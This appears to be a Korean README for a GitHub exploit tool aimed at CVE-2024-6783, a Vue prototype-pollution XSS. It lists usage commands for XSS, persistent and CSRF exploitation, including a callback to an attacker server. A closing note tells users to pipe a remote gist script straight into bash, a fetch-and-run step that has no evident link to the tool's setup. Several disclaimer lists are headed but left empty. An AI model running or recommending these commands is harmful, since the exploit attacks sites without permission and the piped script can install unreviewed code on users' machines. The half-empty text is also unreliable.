
CVE-2024-6783 - Vue CVE
Vue에서 프로토타입 오염(prototype pollution)을 통해 XSS 공격을 수행할 수 있는 취약점이 발견되었습니다. 공격자는 Object.prototype.staticClass 또는 Object.prototype.staticStyle과 같은 일부 속성의 프로토타입 체인을 변경하여 임의의 JavaScript 코드를 실행할 수 있습니다.
PayPal 또는 아래 QR 코드를 스캔하여 이 프로젝트의 유지보수를 지원할 수 있습니다.
이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하십시오:
예제 설정:
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
예제 사용법:
# scan only
python cve-2024-6783.py -u https://example.com -v
# Scan & XSS Exploit
python cve-2024-6783.py -u https://example.com -e xss
# XSS Exploit with Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback
# Automatic Callback Server
python cve-2024-6783.py -u https://example.com -e persistent -c auto
# CSRF Exploitation
python cve-2024-6783.py -u https://example.com -e csrf
# Full Scan and Exploit with Verbose Output
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html
참고:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y 명령을 실행해야 합니다.통제된 환경에서 사이버 보안 개념을 학습, 테스트, 연구하기 위한 저장소입니다.
이 저장소는 교육 및 승인된 보안 연구 전용입니다.
사용자가 다음에 대해 배울 수 있도록 설계되었습니다:
권한이 있는 환경에서만 이 저장소를 사용하십시오. 예:
승인되지 않았거나 불법적인 사용은 엄격히 금지됩니다.
저자와 기여자는 이 프로젝트로 인해 발생하는 어떠한 손해, 오용, 법적 문제 또는 손실에 대해 책임지지 않습니다.
이 저장소를 사용함으로써 다음에 동의하게 됩니다:
이 프로젝트는 다음을 위해 만들어졌습니다:
책임 있는 공개(responsible disclosure) 관행을 따르고 모든 관련 법률을 준수하십시오.
책임 있는 공개 또는 협업을 위해 GitHub를 통해 저장소 관리자에게 연락하십시오.